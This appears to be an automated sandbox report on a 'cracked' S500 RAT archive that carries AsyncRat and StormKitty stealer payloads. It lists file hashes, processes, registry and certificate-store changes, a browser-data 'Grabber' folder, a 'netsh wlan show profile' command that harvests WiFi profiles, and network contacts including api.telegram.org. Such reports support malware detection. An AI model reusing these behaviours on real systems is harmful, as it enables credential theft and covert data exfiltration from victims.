"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\S500 RAT Cracked\Login.txt
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
Files
C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe
| MD5 | 87ca06f69c513f4fbbf67c5b4e366210 |
| SHA1 | 7a0383ddd6f8ec2ec8624358ed0cd2ddc1a366aa |
| SHA256 | 42b6ecf01da5fc49e5d12229a52ddeb9901b13d62ac00a846aa748adb083f8e5 |
| SHA512 | 286f3e8d46fe798b1e37823caea0e28811fb2e42a8e27669622a6477c353a7fe56f8e207ac9aa199df4ceac39ec9fd7bd77bdf01deac8ef448269916457d4acb |
memory/3796-232-0x0000000000FF0000-0x0000000001118000-memory.dmp
memory/3796-234-0x00007FFC2C450000-0x00007FFC2CF12000-memory.dmp
memory/3796-235-0x000000001BE00000-0x000000001BE10000-memory.dmp
memory/3796-236-0x00007FFC2C450000-0x00007FFC2CF12000-memory.dmp
C:\Users\Admin\Desktop\S500 RAT Cracked\Login.txt
| MD5 | d5b77dfb5f248f3aabc560d8300088c5 |
| SHA1 | bbf7bb5f78051a59e725920cea3d54d1e7473cea |
| SHA256 | 113a6f39d02edb55049baa38c50d26579247acb7427e7494805a91e415e21a55 |
| SHA512 | 180e45da4adc3643d40ded2ff526af67361f77b6c61f05d3739e10e41327614a5f57485148f32d047f6d9169230053a77c9cc6fe5e7ced2d2dc285a7b8269552 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-03-20 17:22
Reported
2024-03-20 17:47
Platform
win7-20240221-en
Max time kernel
1313s
Max time network
1240s
Command Line
Signatures
AsyncRat
StormKitty
StormKitty payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe | N/A |
Obfuscated with Agile.Net obfuscator
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\d4578ee47ee76e337547c667d2e9866d\Admin@IZKCKOTP_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini | C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Local\d4578ee47ee76e337547c667d2e9866d\Admin@IZKCKOTP_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini | C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\d4578ee47ee76e337547c667d2e9866d\Admin@IZKCKOTP_en-US\Grabber\DRIVE-C\Users\Admin\Documents\desktop.ini | C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\d4578ee47ee76e337547c667d2e9866d\Admin@IZKCKOTP_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\desktop.ini | C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe | N/A |
| File created | C:\Users\Admin\AppData\Local\d4578ee47ee76e337547c667d2e9866d\Admin@IZKCKOTP_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\desktop.ini | C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
| N/A | icanhazip.com | N/A | N/A |
Looks up geolocation information via web service
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 | C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\TypedURLs | C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8 | C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827 | C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 | C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 | C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\S500 RAT Cracked + Source .rar"
C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe
"C:\Users\Admin\Desktop\S500 RAT Cracked\KeyGenerator.exe"
C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe
"C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe"
C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe
"C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT Cracked.exe"
C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe
"C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C4A6.tmp\C4A7.tmp\C4B8.bat "C:\Users\Admin\Desktop\S500 RAT Cracked\S500RAT.exe""
C:\Windows\system32\chcp.com
chcp 65001
C:\Users\Admin\Desktop\S500 RAT Cracked\ServerRegistrationManager.exe
ServerRegistrationManager.exe
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\netsh.exe
netsh wlan show profile
C:\Windows\SysWOW64\findstr.exe
findstr All
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
C:\Windows\SysWOW64\chcp.com
chcp 65001
C:\Windows\SysWOW64\netsh.exe
netsh wlan show networks mode=bssid
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 8.8.8.8:53 | icanhazip.com | udp |
| US | 104.16.185.241:80 | icanhazip.com | tcp |
| US | 8.8.8.8:53 | api.mylnikov.org | udp |
| US | 104.21.44.66:443 | api.mylnikov.org | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| GB | 96.17.179.205:80 | apps.identrust.com | tcp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| N/A | 127.0.0.1:7707 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:6606 | tcp | |
| N/A | 127.0.0.1:8808 | tcp | |
| N/A | 127.0.0.1:6606 | tcp |
Files
C:\Users\Admin\AppData\Local\Temp\7zECF968F46\S500 RAT Source Code\Dlls\cgeoip.dll
| MD5 | 6d6e172e7965d1250a4a6f8a0513aa9f |
| SHA1 | b0fd4f64e837f48682874251c93258ee2cbcad2b |
| SHA256 | d1ddd15e9c727a5ecf78d3918c17aee0512f5b181ad44952686beb89146e6bd0 |
| SHA512 | 35daa38ad009599145aa241102bcd1f69b4caa55ebc5bb11df0a06567056c0ec5fcd02a33576c54c670755a6384e0229fd2f96622f12304dec58f79e1e834155 |
C:\Users\Admin\AppData\Local\Temp\7zECF968F46\S500 RAT Source Code\Dlls\protobuf-net.dll
| MD5 | 9fbb8cec55b2115c00c0ba386c37ce62 |
| SHA1 | e2378a1c22c35e40fd1c3e19066de4e33b50f24a |
| SHA256 | 9f01d9f2ed07e630ec078efa5d760762c3c8ad3b06e9e8a9062a37d63d57b026 |
| SHA512 | da0211d1c9ba0a59616bc15de80a1fed62b0405cad3b11ae4220ef1488c7837634aad67cbc8b484621a2a6288ef5e424cd816a2523bdb6167abcab76f3ac1a04 |
C:\Users\Admin\AppData\Local\Temp\7zECF968F46\S500 RAT Source Code\Dlls\vestris.resourcelib.dll
| MD5 | 944ce5123c94c66a50376e7b37e3a6a6 |
| SHA1 | a1936ac79c987a5ba47ca3d023f740401f73529b |
| SHA256 | 7da3f0e77c4dddc82df7c16c8c781fade599b7c91e3d32eefbce215b8f06b12a |
| SHA512 | 4c034ff51cc01567f3cb0796575528ca44623b864eb606266bcf955a9259ed26b20bec0086d79038158d3a5af2ada0a90f59d7c6aae9e545294fe77825dbe08b |
C:\Users\Admin\AppData\Local\Temp\7zECF968F46\S500 RAT Source Code\Forms\Form4.resx
| MD5 | 0a4e049a213aef04a4b1fa145a76a752 |
| SHA1 | 3603cb74a5883c3086cb483eb5ed2a1d452fbeb1 |
| SHA256 | 203301e3afc69af0045e4c6d28920fdce85a678de2bb79f53dde11bc7df63d8f |
| SHA512 | 23ee1f3c0b8bd72f7a9c3e904f21b830d27ba5a80e77e3b08790fb7438180c9d9c287da22c84ea41cdf74aee71f1bcb187dd6ea50bdee45b88a3a5cfd7808016 |
C:\Users\Admin\AppData\Local\Temp\7zECF968F46\S500 RAT Source Code\Forms\FormDOS.resx
| MD5 | 5c43b1a8ce131be5e8271794ec520a54 |
| SHA1 | 1d2f31f18ac0b543bab6a1f45ac2d388a6ad119a |
| SHA256 | 048b4c1bd3a6d8c36d30bab692e8b2b24c8ea7310ec7cfdbd5f73e65ec62b153 |
| SHA512 | 4ffe82161a7a1578f8d0299115362c88fd7dec77fe08ab7ca886ae97eb0b064a3d1b7f0529b4708095bef4a278018e70a730f37a147edc338e0d61d31d3f40d6 |
C:\Users\Admin\AppData\Local\Temp\7zECF968F46\S500 RAT Source Code\obj\Debug\net48\Anarchy.Forms.FormRegValueEditMultiString.resources
| MD5 | beda8bbd2a72e45431cf5dd68f7c6e61 |
| SHA1 | 18e28ada040e4c62e33d946046a9ccf66f839f0d |
| SHA256 | f9f9c2a4855d61b7c7f93e9258d0306be802ef9c8c8929186deb71ee96b06d4c |
| SHA512 | 6287bb138431c33a2dd30b7c06c979ee89f691900eb407e14465d58188d04d7697ecc68eb6d479db664ea86f35b7ce6b611834028ddbd56513003c1ca28f0899 |
C:\Users\Admin\AppData\Local\Temp\7zECF968F46\S500 RAT Source Code\obj\Debug\net48\Anarchy.Forms.FormSendFileToMemory.resources
| MD5 | fa80841e3dc9ffb31dd5d015c1030172 |
| SHA1 | aa0d9e66db2a8528edf9931fe132f18870307216 |
| SHA256 | a5b9f5ccfe8ac46a630ac1cc112d343364fa2bc4a2bec0f3911322cff174cff9 |
| SHA512 | a38cc863d3c0c8d944340cd4116f03bbdb2f1526fb40b476cd0adbd444fd1dc10790d35eaf50ea34a1083b163baa82251a5048f075651bc14e46ac4cb82897bd |
